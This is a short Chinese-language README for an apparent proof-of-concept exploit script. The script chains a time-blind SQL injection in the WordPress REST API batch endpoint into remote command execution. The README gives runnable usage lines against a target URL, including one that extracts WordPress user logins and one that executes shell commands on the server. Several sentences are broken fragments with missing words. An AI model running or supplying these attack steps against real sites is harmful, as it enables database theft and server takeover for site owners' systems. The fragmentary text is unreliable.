
CVE-2026-63030 和 CVE-2026-60137 Wp2shell PoC
poc_wp_tot.py 是一个概念验证(PoC),用于利用 WordPress REST API 批量端点上的时间盲SQL注入漏洞,并通过链式升级实现远程代码执行(RCE)。
poc_wp_tot.py 文件到您的工作目录。python3 -m venv venv
source venv/bin/activate

该脚本提供三种操作模式:探测(检测)、提取(获取数据)和 RCE(执行命令)。以下是使用示例。
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : 显示帮助信息-v, --verbose: 启用详细输出(调试)-c <COMMAND> : RCE 模式 — 在目标上执行 shell 命令SLEEP() 函数在目标服务器上作为布尔条件执行(时间盲 SQL 注入)。poc_wp_tot.py 中。calibrate()、get_scalar() 和 exploit_rce() 函数。